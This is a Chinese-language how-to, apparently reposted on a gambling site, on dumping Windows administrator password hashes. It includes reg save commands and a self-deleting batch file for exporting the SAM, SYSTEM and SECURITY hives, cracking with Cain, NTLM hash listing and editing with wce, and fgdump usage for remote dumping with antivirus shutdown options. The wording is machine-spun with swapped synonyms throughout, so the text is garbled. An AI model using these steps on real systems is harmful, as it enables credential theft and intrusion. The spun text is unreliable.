抓取管理员hash值(哈希)的特殊办法脚本之家头条 - 亚美娱乐

抓取管理员hash值(哈希)的特殊办法脚本之家头条

2019-02-07 07:44:59 | 作者: 景彰 | 标签: 文件,运用,办法 | 浏览: 1357

今日抓hash的时分发现GetHashes.exe不好使..别的又测验了几个也都不好用...
不同版别的Windows的hash获取办法不相同. 用到的东西有pwdump7.exe、GetHashes.exe、SAMInside.exe、LC5、Cain、Proactive Password Auditor、Ophcrack.  所以百度了一些材料穿上来!期望咱们能学习一下。  第1种=  运用东西 cain、cmd、wce1.2等  首要运用通用办法抓取HASH  运用指令先保存一份需求的信息。  reg save hklm\sam sam.hive  reg save hklm\system system.hive  reg save hklm\security security.hive  (这三个文件我找了个批处理,这样比较便利)    @echo off reg save hklm\sam sam.hive reg save hklm\system system.hive reg save hklm\security security.hive del %0  =  保存为批处理文件,直接在服务器上运转。  就会在批处理地点目录生成这三个文件  和下面的作用相同,只不过简化了过程 然后咱们运用CAIN翻开保存到的system.hive 和security.hive两个文件。我是在虚拟机里边操作就直接在虚拟机里边搞了。。咱们在服务器上搞能够下载到本地。  翻开CAIN挑选LSA Secrets然后翻开system.hive 和security.hive两个文件 加载后咱们能够看到一些信息,这些信息或许会有明文暗码,我这里是没有的。 假如没有咱们就需求抓HASH了。点击CAIN的Cracker选项卡,加载sam.hive文件。 拿到HASH了,www.jb51.net 下面就是破解,用东西自带的破解试试暗码出来了,我设置的123456 咱们也能够运用彩虹表来破解 下面咱们运用wce来搞。。这个东西是浸透利器哈~~具体介绍咱们自己百度去。 从协助来看咱们能够运用-l参数检查NTML hash  咱们还能够用-s参数来改HASH值如图 从图中咱们能够看到最终一位的HASH我从4修正到了5 第2种= fgdump 能够长途抓Hash的东西  作者:TheLostMind 一向都是本地抓,今日上SamInside论坛看到一个开源的东西,fgdump,能够长途抓。  https://swamp.foofus.net/fizzgig/fgdump/fgdump-usage.htm  fgDump 2.1.0 - fizzgig and the mighty group at foofus.net Written to make j0m0kuns life just a bit easier Copyright(C) 2008 fizzgig and foofus.net fgdump comes with ABSOLUTELY NO WARRANTY! This is free software, and you are welcome to redistribute it under certain conditions; see the COPYING and README files for more information. Usage: fgdump [-?][-t][-c][-w][-s][-r][-v][-k][-o][-a][-O 32|64][-l logfile][-T threads] [{{-h Host | -f filename} -u Username -p Password | -H filename}] where Username and Password have administrator credentials -? displays help (youre looking at it!) -t will test for the presence of antivirus without actually running the password dumps -c skips the cache dump -w skips the password dump -s performs the protected storage dump -r forgets about existing pwdump/cachedump files. The default behavior is to skip a host if these files already exist. -v makes output more verbose. Use twice for greater effect -k keeps the pwdump/cachedump going even if antivirus is in an unknown state -l logs all output to logfile -T runs fgdump with the specified number of parallel threads -h is the name of the single host to perform the dumps against -f reads hosts from a line-separated file -H reads host:username:password from a line-separated file (per-host credentials) -o skips pwdump history dumps -a will not attempt to detect or shut down antivirus, even if it is present  -O manually sets whether the target is a 32- or 64-bit OS. Note that this applies to all hosts specified. ** As of version 1.4.0, you can run fgdump with no parameters to dump the local box (no impersonation or binding) 测验了一下,很不错,简略翻译了一下协助。  用法: fgdump [-?][-t][-c][-w][-s][-r][-v][-k][-o][-a][-O 32|64][-l logfile][-T threads] [{{-h Host | -f filename} -u  Username -p Password | -H filename}]  用户名和暗码要求要有管理员资历  -? 显现协助 -t 测验当时的杀毒软件,并不是真实的转储暗码 -c 越过缓存转储 -w 越过暗码转储 -s 履行维护存贮转储 -r 疏忽现存的pwdump/cachedump文件。默许的行为是越过存在这些文件的主机。 -v 具体输出. 运用两次能取得更为具体的输出 -k 即便不知道杀毒软件的状况也持续履行pwdump/cachedump(进行暗码转储) -l 记载一切输出到日志文件 -T 运用指定数量的线程履行此程序 -h 需求履行暗码转储的单个方针主机 -f 从用行分隔的文件中读取主机列表 -H 从用行分隔的文件中读取 主机名:用户名:暗码 -o 越过转储前史暗码 -a 企图检测或封闭杀毒软件,即便杀毒软件正在运转  -O 手艺设置长途主机是32位操作系统仍是64位操作系统。 留意:这项操作应用到一切指定的主机。  ** 运用1.4.0,你能够直接运转此程序,不需求带参数,来转储本机暗码
版权声明
本文来源于网络,版权归原作者所有,其内容与观点不代表亚美娱乐立场。转载文章仅为传播更有价值的信息,如采编人员采编有误或者版权原因,请与我们联系,我们核实后立即修改或删除。

猜您喜欢的文章